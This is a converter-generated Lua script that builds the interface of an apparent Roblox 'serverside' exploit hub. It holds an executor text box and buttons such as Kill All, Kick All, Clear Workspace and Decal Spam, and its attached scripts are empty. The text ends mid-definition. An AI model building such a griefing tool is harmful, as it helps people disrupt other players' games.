--[=[
 d888b  db    db d888888b      .d888b.      db      db    db  .d8b.  
88' Y8b 88    88   `88'        VP  `8D      88      88    88 d8' `8b 
88      88    88    88            odD'      88      88    88 88ooo88 
88  ooo 88    88    88          .88'        88      88    88 88~~~88 
88. ~8~ 88b  d88   .88.        j88.         88booo. 88b  d88 88   88    @uniquadev
 Y888P  ~Y8888P' Y888888P      888888D      Y88888P ~Y8888P' YP   YP  CONVERTER 
]=]

-- Instances: 83 | Scripts: 21 | Modules: 0 | Tags: 0
local G2L = {};

-- StarterGui.ScreenGui
G2L["1"] = Instance.new("ScreenGui", game:GetService("CoreGui"));
G2L["1"]["ZIndexBehavior"] = Enum.ZIndexBehavior.Sibling;


-- StarterGui.ScreenGui.LocalScript
G2L["2"] = Instance.new("LocalScript", G2L["1"]);



-- StarterGui.ScreenGui.LocalScript
G2L["3"] = Instance.new("LocalScript", G2L["1"]);



-- StarterGui.ScreenGui.Frame
G2L["4"] = Instance.new("Frame", G2L["1"]);
G2L["4"]["BorderSizePixel"] = 0;
G2L["4"]["BackgroundColor3"] = Color3.fromRGB(41, 41, 41);
G2L["4"]["Size"] = UDim2.new(0, 417, 0, 296);
G2L["4"]["Position"] = UDim2.new(0.2379, 0, 0.25628, 0);
G2L["4"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);


-- StarterGui.ScreenGui.Frame.LocalScript
G2L["5"] = Instance.new("LocalScript", G2L["4"]);



-- StarterGui.ScreenGui.Frame.Frame2
G2L["6"] = Instance.new("Frame", G2L["4"]);
G2L["6"]["BorderSizePixel"] = 0;
G2L["6"]["BackgroundColor3"] = Color3.fromRGB(41, 41, 41);
G2L["6"]["Size"] = UDim2.new(0, 417, 0, 48);
G2L["6"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["6"]["Name"] = [[Frame2]];


-- StarterGui.ScreenGui.Frame.Frame2.TextLabel
G2L["7"] = Instance.new("TextLabel", G2L["6"]);
G2L["7"]["TextWrapped"] = true;
G2L["7"]["BorderSizePixel"] = 0;
G2L["7"]["TextSize"] = 14;
G2L["7"]["TextXAlignment"] = Enum.TextXAlignment.Left;
G2L["7"]["TextYAlignment"] = Enum.TextYAlignment.Top;
G2L["7"]["TextScaled"] = true;
G2L["7"]["BackgroundColor3"] = Color3.fromRGB(255, 255, 255);
G2L["7"]["FontFace"] = Font.new([[rbxasset://fonts/families/SourceSansPro.json]], Enum.FontWeight.Regular, Enum.FontStyle.Normal);
G2L["7"]["TextColor3"] = Color3.fromRGB(255, 255, 255);
G2L["7"]["BackgroundTransparency"] = 1;
G2L["7"]["Size"] = UDim2.new(0, 394, 0, 26);
G2L["7"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["7"]["Text"] = [[l0st serverside v3]];
G2L["7"]["Position"] = UDim2.new(0.04317, 0, 0, 0);


-- StarterGui.ScreenGui.Frame.Frame2.Frame
G2L["8"] = Instance.new("Frame", G2L["6"]);
G2L["8"]["BorderSizePixel"] = 0;
G2L["8"]["BackgroundColor3"] = Color3.fromRGB(0, 0, 0);
G2L["8"]["Size"] = UDim2.new(0, 430, 0, 10);
G2L["8"]["Position"] = UDim2.new(-0.01679, 0, -0.20833, 0);
G2L["8"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);


-- StarterGui.ScreenGui.Frame.Frame2.Frame
G2L["9"] = Instance.new("Frame", G2L["6"]);
G2L["9"]["BorderSizePixel"] = 0;
G2L["9"]["BackgroundColor3"] = Color3.fromRGB(0, 0, 0);
G2L["9"]["Size"] = UDim2.new(0, 408, 0, 6);
G2L["9"]["Position"] = UDim2.new(0.03357, 0, 0.54167, 0);
G2L["9"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);


-- StarterGui.ScreenGui.Frame.TextBox
G2L["a"] = Instance.new("TextBox", G2L["4"]);
G2L["a"]["TextXAlignment"] = Enum.TextXAlignment.Left;
G2L["a"]["PlaceholderColor3"] = Color3.fromRGB(255, 255, 255);
G2L["a"]["BorderSizePixel"] = 0;
G2L["a"]["TextWrapped"] = true;
G2L["a"]["TextSize"] = 14;
G2L["a"]["TextColor3"] = Color3.fromRGB(255, 255, 255);
G2L["a"]["TextYAlignment"] = Enum.TextYAlignment.Top;
G2L["a"]["TextScaled"] = true;
G2L["a"]["BackgroundColor3"] = Color3.fromRGB(50, 50, 50);
G2L["a"]["FontFace"] = Font.new([[rbxasset://fonts/families/SourceSansPro.json]], Enum.FontWeight.Regular, Enum.FontStyle.Normal);
G2L["a"]["Size"] = UDim2.new(0, 390, 0, 186);
G2L["a"]["Position"] = UDim2.new(0.05127, 0, 0.13626, 0);
G2L["a"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["a"]["Text"] = [[]];


-- StarterGui.ScreenGui.Frame.TextBox.LocalScript
G2L["b"] = Instance.new("LocalScript", G2L["a"]);



-- StarterGui.ScreenGui.Frame.TextBox.LocalScript
G2L["c"] = Instance.new("LocalScript", G2L["a"]);



-- StarterGui.ScreenGui.Frame.ScriptHubFrame
G2L["d"] = Instance.new("ScrollingFrame", G2L["4"]);
G2L["d"]["Active"] = true;
G2L["d"]["ScrollingDirection"] = Enum.ScrollingDirection.Y;
G2L["d"]["BorderSizePixel"] = 0;
G2L["d"]["CanvasPosition"] = Vector2.new(0, 936);
G2L["d"]["BackgroundColor3"] = Color3.fromRGB(0, 0, 0);
G2L["d"]["Name"] = [[ScriptHubFrame]];
G2L["d"]["AutomaticCanvasSize"] = Enum.AutomaticSize.Y;
G2L["d"]["Size"] = UDim2.new(0, 98, 0, 319);
G2L["d"]["Position"] = UDim2.new(1.01439, 0, -0.03378, 0);
G2L["d"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["d"]["ScrollBarThickness"] = 10;


-- StarterGui.ScreenGui.Frame.ScriptHubFrame.LocalScript
G2L["e"] = Instance.new("LocalScript", G2L["d"]);



-- StarterGui.ScreenGui.Frame.ScriptHubFrame.LocalScript
G2L["f"] = Instance.new("LocalScript", G2L["d"]);



-- StarterGui.ScreenGui.Frame.ScriptHubFrame.c00lgui
G2L["10"] = Instance.new("TextButton", G2L["d"]);
G2L["10"]["TextWrapped"] = true;
G2L["10"]["BorderSizePixel"] = 0;
G2L["10"]["TextSize"] = 14;
G2L["10"]["TextScaled"] = true;
G2L["10"]["TextColor3"] = Color3.fromRGB(255, 255, 255);
G2L["10"]["BackgroundColor3"] = Color3.fromRGB(40, 40, 40);
G2L["10"]["FontFace"] = Font.new([[rbxasset://fonts/families/SourceSansPro.json]], Enum.FontWeight.Regular, Enum.FontStyle.Normal);
G2L["10"]["Size"] = UDim2.new(0, 90, 0, 31);
G2L["10"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["10"]["Text"] = [[c00lgui]];
G2L["10"]["Name"] = [[c00lgui]];


-- StarterGui.ScreenGui.Frame.ScriptHubFrame.polaria
G2L["11"] = Instance.new("TextButton", G2L["d"]);
G2L["11"]["TextWrapped"] = true;
G2L["11"]["BorderSizePixel"] = 0;
G2L["11"]["TextSize"] = 14;
G2L["11"]["TextScaled"] = true;
G2L["11"]["TextColor3"] = Color3.fromRGB(255, 255, 255);
G2L["11"]["BackgroundColor3"] = Color3.fromRGB(40, 40, 40);
G2L["11"]["FontFace"] = Font.new([[rbxasset://fonts/families/SourceSansPro.json]], Enum.FontWeight.Regular, Enum.FontStyle.Normal);
G2L["11"]["Size"] = UDim2.new(0, 90, 0, 31);
G2L["11"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["11"]["Text"] = [[Polaria]];
G2L["11"]["Name"] = [[polaria]];
G2L["11"]["Position"] = UDim2.new(0, 0, 0.11285, 0);


-- StarterGui.ScreenGui.Frame.ScriptHubFrame.hdadmin
G2L["12"] = Instance.new("TextButton", G2L["d"]);
G2L["12"]["TextWrapped"] = true;
G2L["12"]["BorderSizePixel"] = 0;
G2L["12"]["TextSize"] = 14;
G2L["12"]["TextScaled"] = true;
G2L["12"]["TextColor3"] = Color3.fromRGB(255, 255, 255);
G2L["12"]["BackgroundColor3"] = Color3.fromRGB(40, 40, 40);
G2L["12"]["FontFace"] = Font.new([[rbxasset://fonts/families/SourceSansPro.json]], Enum.FontWeight.Regular, Enum.FontStyle.Normal);
G2L["12"]["Size"] = UDim2.new(0, 90, 0, 31);
G2L["12"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["12"]["Text"] = [[HD Admin]];
G2L["12"]["Name"] = [[hdadmin]];
G2L["12"]["Position"] = UDim2.new(0, 0, 0.22571, 0);


-- StarterGui.ScreenGui.Frame.ScriptHubFrame.killall
G2L["13"] = Instance.new("TextButton", G2L["d"]);
G2L["13"]["TextWrapped"] = true;
G2L["13"]["BorderSizePixel"] = 0;
G2L["13"]["TextSize"] = 14;
G2L["13"]["TextScaled"] = true;
G2L["13"]["TextColor3"] = Color3.fromRGB(255, 255, 255);
G2L["13"]["BackgroundColor3"] = Color3.fromRGB(40, 40, 40);
G2L["13"]["FontFace"] = Font.new([[rbxasset://fonts/families/SourceSansPro.json]], Enum.FontWeight.Regular, Enum.FontStyle.Normal);
G2L["13"]["Size"] = UDim2.new(0, 90, 0, 31);
G2L["13"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["13"]["Text"] = [[Kill All]];
G2L["13"]["Name"] = [[killall]];
G2L["13"]["Position"] = UDim2.new(0, 0, 0.33856, 0);


-- StarterGui.ScreenGui.Frame.ScriptHubFrame.UIListLayout
G2L["14"] = Instance.new("UIListLayout", G2L["d"]);
G2L["14"]["Padding"] = UDim.new(0, 5);
G2L["14"]["SortOrder"] = Enum.SortOrder.LayoutOrder;


-- StarterGui.ScreenGui.Frame.ScriptHubFrame.1xgui
G2L["15"] = Instance.new("TextButton", G2L["d"]);
G2L["15"]["TextWrapped"] = true;
G2L["15"]["BorderSizePixel"] = 0;
G2L["15"]["TextSize"] = 14;
G2L["15"]["TextScaled"] = true;
G2L["15"]["TextColor3"] = Color3.fromRGB(255, 255, 255);
G2L["15"]["BackgroundColor3"] = Color3.fromRGB(40, 40, 40);
G2L["15"]["FontFace"] = Font.new([[rbxasset://fonts/families/SourceSansPro.json]], Enum.FontWeight.Regular, Enum.FontStyle.Normal);
G2L["15"]["Size"] = UDim2.new(0, 90, 0, 31);
G2L["15"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["15"]["Text"] = [[1x1x1x1 GUI]];
G2L["15"]["Name"] = [[1xgui]];
G2L["15"]["Position"] = UDim2.new(0, 0, 0.45141, 0);


-- StarterGui.ScreenGui.Frame.ScriptHubFrame.hint
G2L["16"] = Instance.new("TextButton", G2L["d"]);
G2L["16"]["TextWrapped"] = true;
G2L["16"]["BorderSizePixel"] = 0;
G2L["16"]["TextSize"] = 14;
G2L["16"]["TextScaled"] = true;
G2L["16"]["TextColor3"] = Color3.fromRGB(255, 255, 255);
G2L["16"]["BackgroundColor3"] = Color3.fromRGB(40, 40, 40);
G2L["16"]["FontFace"] = Font.new([[rbxasset://fonts/families/SourceSansPro.json]], Enum.FontWeight.Regular, Enum.FontStyle.Normal);
G2L["16"]["Size"] = UDim2.new(0, 90, 0, 31);
G2L["16"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["16"]["Text"] = [[Hacked Game Hint]];
G2L["16"]["Name"] = [[hint]];
G2L["16"]["Position"] = UDim2.new(0, 0, 0.56426, 0);


-- StarterGui.ScreenGui.Frame.ScriptHubFrame.deletehints
G2L["17"] = Instance.new("TextButton", G2L["d"]);
G2L["17"]["TextWrapped"] = true;
G2L["17"]["BorderSizePixel"] = 0;
G2L["17"]["TextSize"] = 14;
G2L["17"]["TextScaled"] = true;
G2L["17"]["TextColor3"] = Color3.fromRGB(255, 255, 255);
G2L["17"]["BackgroundColor3"] = Color3.fromRGB(40, 40, 40);
G2L["17"]["FontFace"] = Font.new([[rbxasset://fonts/families/SourceSansPro.json]], Enum.FontWeight.Regular, Enum.FontStyle.Normal);
G2L["17"]["Size"] = UDim2.new(0, 90, 0, 31);
G2L["17"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["17"]["Text"] = [[Delete Hints]];
G2L["17"]["Name"] = [[deletehints]];
G2L["17"]["Position"] = UDim2.new(0, 0, 0.67712, 0);


-- StarterGui.ScreenGui.Frame.ScriptHubFrame.playmusic
G2L["18"] = Instance.new("TextButton", G2L["d"]);
G2L["18"]["TextWrapped"] = true;
G2L["18"]["BorderSizePixel"] = 0;
G2L["18"]["TextSize"] = 14;
G2L["18"]["TextScaled"] = true;
G2L["18"]["TextColor3"] = Color3.fromRGB(255, 255, 255);
G2L["18"]["BackgroundColor3"] = Color3.fromRGB(40, 40, 40);
G2L["18"]["FontFace"] = Font.new([[rbxasset://fonts/families/SourceSansPro.json]], Enum.FontWeight.Regular, Enum.FontStyle.Normal);
G2L["18"]["Size"] = UDim2.new(0, 90, 0, 31);
G2L["18"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["18"]["Text"] = [[Play spooky scary skeletons]];
G2L["18"]["Name"] = [[playmusic]];
G2L["18"]["Position"] = UDim2.new(0, 0, 0.78997, 0);


-- StarterGui.ScreenGui.Frame.ScriptHubFrame.setskybox
G2L["19"] = Instance.new("TextButton", G2L["d"]);
G2L["19"]["TextWrapped"] = true;
G2L["19"]["BorderSizePixel"] = 0;
G2L["19"]["TextSize"] = 14;
G2L["19"]["TextScaled"] = true;
G2L["19"]["TextColor3"] = Color3.fromRGB(255, 255, 255);
G2L["19"]["BackgroundColor3"] = Color3.fromRGB(40, 40, 40);
G2L["19"]["FontFace"] = Font.new([[rbxasset://fonts/families/SourceSansPro.json]], Enum.FontWeight.Regular, Enum.FontStyle.Normal);
G2L["19"]["Size"] = UDim2.new(0, 90, 0, 31);
G2L["19"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["19"]["Text"] = [[Set Skybox]];
G2L["19"]["Name"] = [[setskybox]];
G2L["19"]["Position"] = UDim2.new(0, 0, 0.90282, 0);


-- StarterGui.ScreenGui.Frame.ScriptHubFrame.fixskybox
G2L["1a"] = Instance.new("TextButton", G2L["d"]);
G2L["1a"]["TextWrapped"] = true;
G2L["1a"]["BorderSizePixel"] = 0;
G2L["1a"]["TextSize"] = 14;
G2L["1a"]["TextScaled"] = true;
G2L["1a"]["TextColor3"] = Color3.fromRGB(255, 255, 255);
G2L["1a"]["BackgroundColor3"] = Color3.fromRGB(40, 40, 40);
G2L["1a"]["FontFace"] = Font.new([[rbxasset://fonts/families/SourceSansPro.json]], Enum.FontWeight.Regular, Enum.FontStyle.Normal);
G2L["1a"]["Size"] = UDim2.new(0, 90, 0, 31);
G2L["1a"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["1a"]["Text"] = [[Restore Skybox]];
G2L["1a"]["Name"] = [[fixskybox]];
G2L["1a"]["Position"] = UDim2.new(0, 0, 1.01567, 0);


-- StarterGui.ScreenGui.Frame.ScriptHubFrame.decalspam
G2L["1b"] = Instance.new("TextButton", G2L["d"]);
G2L["1b"]["TextWrapped"] = true;
G2L["1b"]["BorderSizePixel"] = 0;
G2L["1b"]["TextSize"] = 14;
G2L["1b"]["TextScaled"] = true;
G2L["1b"]["TextColor3"] = Color3.fromRGB(255, 255, 255);
G2L["1b"]["BackgroundColor3"] = Color3.fromRGB(40, 40, 40);
G2L["1b"]["FontFace"] = Font.new([[rbxasset://fonts/families/SourceSansPro.json]], Enum.FontWeight.Regular, Enum.FontStyle.Normal);
G2L["1b"]["Size"] = UDim2.new(0, 90, 0, 31);
G2L["1b"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["1b"]["Text"] = [[Decal Spam]];
G2L["1b"]["Name"] = [[decalspam]];
G2L["1b"]["Position"] = UDim2.new(0, 0, 1.12853, 0);


-- StarterGui.ScreenGui.Frame.ScriptHubFrame.flood
G2L["1c"] = Instance.new("TextButton", G2L["d"]);
G2L["1c"]["TextWrapped"] = true;
G2L["1c"]["BorderSizePixel"] = 0;
G2L["1c"]["TextSize"] = 14;
G2L["1c"]["TextScaled"] = true;
G2L["1c"]["TextColor3"] = Color3.fromRGB(255, 255, 255);
G2L["1c"]["BackgroundColor3"] = Color3.fromRGB(40, 40, 40);
G2L["1c"]["FontFace"] = Font.new([[rbxasset://fonts/families/SourceSansPro.json]], Enum.FontWeight.Regular, Enum.FontStyle.Normal);
G2L["1c"]["Size"] = UDim2.new(0, 90, 0, 31);
G2L["1c"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["1c"]["Text"] = [[Flood]];
G2L["1c"]["Name"] = [[flood]];
G2L["1c"]["Position"] = UDim2.new(0, 0, 1.24138, 0);


-- StarterGui.ScreenGui.Frame.ScriptHubFrame.kickall
G2L["1d"] = Instance.new("TextButton", G2L["d"]);
G2L["1d"]["TextWrapped"] = true;
G2L["1d"]["BorderSizePixel"] = 0;
G2L["1d"]["TextSize"] = 14;
G2L["1d"]["TextScaled"] = true;
G2L["1d"]["TextColor3"] = Color3.fromRGB(255, 255, 255);
G2L["1d"]["BackgroundColor3"] = Color3.fromRGB(40, 40, 40);
G2L["1d"]["FontFace"] = Font.new([[rbxasset://fonts/families/SourceSansPro.json]], Enum.FontWeight.Regular, Enum.FontStyle.Normal);
G2L["1d"]["Size"] = UDim2.new(0, 90, 0, 31);
G2L["1d"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["1d"]["Text"] = [[Kick All]];
G2L["1d"]["Name"] = [[kickall]];
G2L["1d"]["Position"] = UDim2.new(0, 0, 1.35423, 0);


-- StarterGui.ScreenGui.Frame.ScriptHubFrame.hackmessage
G2L["1e"] = Instance.new("TextButton", G2L["d"]);
G2L["1e"]["TextWrapped"] = true;
G2L["1e"]["BorderSizePixel"] = 0;
G2L["1e"]["TextSize"] = 14;
G2L["1e"]["TextScaled"] = true;
G2L["1e"]["TextColor3"] = Color3.fromRGB(255, 255, 255);
G2L["1e"]["BackgroundColor3"] = Color3.fromRGB(40, 40, 40);
G2L["1e"]["FontFace"] = Font.new([[rbxasset://fonts/families/SourceSansPro.json]], Enum.FontWeight.Regular, Enum.FontStyle.Normal);
G2L["1e"]["Size"] = UDim2.new(0, 90, 0, 31);
G2L["1e"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["1e"]["Text"] = [[TextLabel Hack All]];
G2L["1e"]["Name"] = [[hackmessage]];
G2L["1e"]["Position"] = UDim2.new(0, 0, 1.46708, 0);


-- StarterGui.ScreenGui.Frame.ScriptHubFrame.clearwater
G2L["1f"] = Instance.new("TextButton", G2L["d"]);
G2L["1f"]["TextWrapped"] = true;
G2L["1f"]["BorderSizePixel"] = 0;
G2L["1f"]["TextSize"] = 14;
G2L["1f"]["TextScaled"] = true;
G2L["1f"]["TextColor3"] = Color3.fromRGB(255, 255, 255);
G2L["1f"]["BackgroundColor3"] = Color3.fromRGB(40, 40, 40);
G2L["1f"]["FontFace"] = Font.new([[rbxasset://fonts/families/SourceSansPro.json]], Enum.FontWeight.Regular, Enum.FontStyle.Normal);
G2L["1f"]["Size"] = UDim2.new(0, 90, 0, 31);
G2L["1f"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["1f"]["Text"] = [[Clear Terrain]];
G2L["1f"]["Name"] = [[clearwater]];
G2L["1f"]["Position"] = UDim2.new(0, 0, 1.57994, 0);


-- StarterGui.ScreenGui.Frame.ScriptHubFrame.trollall
G2L["20"] = Instance.new("TextButton", G2L["d"]);
G2L["20"]["TextWrapped"] = true;
G2L["20"]["BorderSizePixel"] = 0;
G2L["20"]["TextSize"] = 14;
G2L["20"]["TextScaled"] = true;
G2L["20"]["TextColor3"] = Color3.fromRGB(255, 255, 255);
G2L["20"]["BackgroundColor3"] = Color3.fromRGB(40, 40, 40);
G2L["20"]["FontFace"] = Font.new([[rbxasset://fonts/families/SourceSansPro.json]], Enum.FontWeight.Regular, Enum.FontStyle.Normal);
G2L["20"]["Size"] = UDim2.new(0, 90, 0, 31);
G2L["20"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["20"]["Text"] = [[Troll All]];
G2L["20"]["Name"] = [[trollall]];
G2L["20"]["Position"] = UDim2.new(0, 0, 1.69279, 0);


-- StarterGui.ScreenGui.Frame.ScriptHubFrame.atmosphere
G2L["21"] = Instance.new("TextButton", G2L["d"]);
G2L["21"]["TextWrapped"] = true;
G2L["21"]["BorderSizePixel"] = 0;
G2L["21"]["TextSize"] = 14;
G2L["21"]["TextScaled"] = true;
G2L["21"]["TextColor3"] = Color3.fromRGB(255, 255, 255);
G2L["21"]["BackgroundColor3"] = Color3.fromRGB(40, 40, 40);
G2L["21"]["FontFace"] = Font.new([[rbxasset://fonts/families/SourceSansPro.json]], Enum.FontWeight.Regular, Enum.FontStyle.Normal);
G2L["21"]["Size"] = UDim2.new(0, 90, 0, 31);
G2L["21"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["21"]["Text"] = [[Delete Atmosphere]];
G2L["21"]["Name"] = [[atmosphere]];
G2L["21"]["Position"] = UDim2.new(0, 0, 1.80564, 0);


-- StarterGui.ScreenGui.Frame.ScriptHubFrame.deleteall
G2L["22"] = Instance.new("TextButton", G2L["d"]);
G2L["22"]["TextWrapped"] = true;
G2L["22"]["BorderSizePixel"] = 0;
G2L["22"]["TextSize"] = 14;
G2L["22"]["TextScaled"] = true;
G2L["22"]["TextColor3"] = Color3.fromRGB(255, 255, 255);
G2L["22"]["BackgroundColor3"] = Color3.fromRGB(40, 40, 40);
G2L["22"]["FontFace"] = Font.new([[rbxasset://fonts/families/SourceSansPro.json]], Enum.FontWeight.Regular, Enum.FontStyle.Normal);
G2L["22"]["Size"] = UDim2.new(0, 90, 0, 31);
G2L["22"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["22"]["Text"] = [[Clear Workspace]];
G2L["22"]["Name"] = [[deleteall]];
G2L["22"]["Position"] = UDim2.new(0, 0, 1.9185, 0);


-- StarterGui.ScreenGui.Frame.ScriptHubFrame.killsound
G2L["23"] = Instance.new("TextButton", G2L["d"]);
G2L["23"]["TextWrapped"] = true;
G2L["23"]["BorderSizePixel"] = 0;
G2L["23"]["TextSize"] = 14;
G2L["23"]["TextScaled"] = true;
G2L["23"]["TextColor3"] = Color3.fromRGB(255, 255, 255);
G2L["23"]["BackgroundColor3"] = Color3.fromRGB(40, 40, 40);
G2L["23"]["FontFace"] = Font.new([[rbxasset://fonts/families/SourceSansPro.json]], Enum.FontWeight.Regular, Enum.FontStyle.Normal);
G2L["23"]["Size"] = UDim2.new(0, 90, 0, 31);
G2L["23"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["23"]["Text"] = [[Destroy All Sounds]];
G2L["23"]["Name"] = [[killsound]];
G2L["23"]["Position"] = UDim2.new(0, 0, 2.03135, 0);


-- StarterGui.ScreenGui.Frame.ScriptHubFrame.destroydecal
G2L["24"] = Instance.new("TextButton", G2L["d"]);
G2L["24"]["TextWrapped"] = true;
G2L["24"]["BorderSizePixel"] = 0;
G2L["24"]["TextSize"] = 14;
G2L["24"]["TextScaled"] = true;
G2L["24"]["TextColor3"] = Color3.fromRGB(255, 255, 255);
G2L["24"]["BackgroundColor3"] = Color3.fromRGB(40, 40, 40);
G2L["24"]["FontFace"] = Font.new([[rbxasset://fonts/families/SourceSansPro.json]], Enum.FontWeight.Regular, Enum.FontStyle.Normal);
G2L["24"]["Size"] = UDim2.new(0, 90, 0, 31);
G2L["24"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["24"]["Text"] = [[Destroy All Decals]];
G2L["24"]["Name"] = [[destroydecal]];
G2L["24"]["Position"] = UDim2.new(0, 0, 2.1442, 0);


-- StarterGui.ScreenGui.Frame.ScriptHubFrame.hackmsg
G2L["25"] = Instance.new("TextButton", G2L["d"]);
G2L["25"]["TextWrapped"] = true;
G2L["25"]["BorderSizePixel"] = 0;
G2L["25"]["TextSize"] = 14;
G2L["25"]["TextScaled"] = true;
G2L["25"]["TextColor3"] = Color3.fromRGB(255, 255, 255);
G2L["25"]["BackgroundColor3"] = Color3.fromRGB(40, 40, 40);
G2L["25"]["FontFace"] = Font.new([[rbxasset://fonts/families/SourceSansPro.json]], Enum.FontWeight.Regular, Enum.FontStyle.Normal);
G2L["25"]["Size"] = UDim2.new(0, 90, 0, 31);
G2L["25"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["25"]["Text"] = [[Hack Message]];
G2L["25"]["Name"] = [[hackmsg]];
G2L["25"]["Position"] = UDim2.new(0, 0, 2.25705, 0);


-- StarterGui.ScreenGui.Frame.ScriptHubFrame.tpall
G2L["26"] = Instance.new("TextButton", G2L["d"]);
G2L["26"]["TextWrapped"] = true;
G2L["26"]["BorderSizePixel"] = 0;
G2L["26"]["TextSize"] = 14;
G2L["26"]["TextScaled"] = true;
G2L["26"]["TextColor3"] = Color3.fromRGB(255, 255, 255);
G2L["26"]["BackgroundColor3"] = Color3.fromRGB(40, 40, 40);
G2L["26"]["FontFace"] = Font.new([[rbxasset://fonts/families/SourceSansPro.json]], Enum.FontWeight.Regular, Enum.FontStyle.Normal);
G2L["26"]["Size"] = UDim2.new(0, 90, 0, 31);
G2L["26"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["26"]["Text"] = [[Teleport All]];
G2L["26"]["Name"] = [[tpall]];
G2L["26"]["Position"] = UDim2.new(0, 0, 2.36991, 0);


-- StarterGui.ScreenGui.Frame.ScriptHubFrame.timewarp
G2L["27"] = Instance.new("TextButton", G2L["d"]);
G2L["27"]["TextWrapped"] = true;
G2L["27"]["BorderSizePixel"] = 0;
G2L["27"]["TextSize"] = 14;
G2L["27"]["TextScaled"] = true;
G2L["27"]["TextColor3"] = Color3.fromRGB(255, 255, 255);
G2L["27"]["BackgroundColor3"] = Color3.fromRGB(40, 40, 40);
G2L["27"]["FontFace"] = Font.new([[rbxasset://fonts/families/SourceSansPro.json]], Enum.FontWeight.Regular, Enum.FontStyle.Normal);
G2L["27"]["Size"] = UDim2.new(0, 90, 0, 31);
G2L["27"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["27"]["Text"] = [[Warp Time]];
G2L["27"]["Name"] = [[timewarp]];
G2L["27"]["Position"] = UDim2.new(0, 0, 2.48276, 0);


-- StarterGui.ScreenGui.Frame.ScriptHubFrame.c00lkidd
G2L["28"] = Instance.new("TextButton", G2L["d"]);
G2L["28"]["TextWrapped"] = true;
G2L["28"]["BorderSizePixel"] = 0;
G2L["28"]["TextSize"] = 14;
G2L["28"]["TextScaled"] = true;
G2L["28"]["TextColor3"] = Color3.fromRGB(255, 255, 255);
G2L["28"]["BackgroundColor3"] = Color3.fromRGB(40, 40, 40);
G2L["28"]["FontFace"] = Font.new([[rbxasset://fonts/families/SourceSansPro.json]], Enum.FontWeight.Regular, Enum.FontStyle.Normal);
G2L["28"]["Size"] = UDim2.new(0, 90, 0, 31);
G2L["28"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["28"]["Text"] = [[Forsaken c00lkidd]];
G2L["28"]["Name"] = [[c00lkidd]];
G2L["28"]["Position"] = UDim2.new(0, 0, 2.59561, 0);


-- StarterGui.ScreenGui.Frame.ScriptHubFrame.billboardall
G2L["29"] = Instance.new("TextButton", G2L["d"]);
G2L["29"]["TextWrapped"] = true;
G2L["29"]["BorderSizePixel"] = 0;
G2L["29"]["TextSize"] = 14;
G2L["29"]["TextScaled"] = true;
G2L["29"]["TextColor3"] = Color3.fromRGB(255, 255, 255);
G2L["29"]["BackgroundColor3"] = Color3.fromRGB(40, 40, 40);
G2L["29"]["FontFace"] = Font.new([[rbxasset://fonts/families/SourceSansPro.json]], Enum.FontWeight.Regular, Enum.FontStyle.Normal);
G2L["29"]["Size"] = UDim2.new(0, 90, 0, 31);
G2L["29"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["29"]["Text"] = [[BillBoard All]];
G2L["29"]["Name"] = [[billboardall]];
G2L["29"]["Position"] = UDim2.new(0, 0, 2.70846, 0);


-- StarterGui.ScreenGui.Frame.ScriptHubFrame.music
G2L["2a"] = Instance.new("TextButton", G2L["d"]);
G2L["2a"]["TextWrapped"] = true;
G2L["2a"]["BorderSizePixel"] = 0;
G2L["2a"]["TextSize"] = 14;
G2L["2a"]["TextScaled"] = true;
G2L["2a"]["TextColor3"] = Color3.fromRGB(255, 255, 255);
G2L["2a"]["BackgroundColor3"] = Color3.fromRGB(40, 40, 40);
G2L["2a"]["FontFace"] = Font.new([[rbxasset://fonts/families/SourceSansPro.json]], Enum.FontWeight.Regular, Enum.FontStyle.Normal);
G2L["2a"]["Size"] = UDim2.new(0, 90, 0, 31);
G2L["2a"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["2a"]["Text"] = [[Troll Music]];
G2L["2a"]["Name"] = [[music]];
G2L["2a"]["Position"] = UDim2.new(0, 0, 2.82132, 0);


-- StarterGui.ScreenGui.Frame.ScriptHubFrame.particle
G2L["2b"] = Instance.new("TextButton", G2L["d"]);
G2L["2b"]["TextWrapped"] = true;
G2L["2b"]["BorderSizePixel"] = 0;
G2L["2b"]["TextSize"] = 14;
G2L["2b"]["TextScaled"] = true;
G2L["2b"]["TextColor3"] = Color3.fromRGB(255, 255, 255);
G2L["2b"]["BackgroundColor3"] = Color3.fromRGB(40, 40, 40);
G2L["2b"]["FontFace"] = Font.new([[rbxasset://fonts/families/SourceSansPro.json]], Enum.FontWeight.Regular, Enum.FontStyle.Normal);
G2L["2b"]["Size"] = UDim2.new(0, 90, 0, 31);
G2L["2b"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["2b"]["Text"] = [[Particle All]];
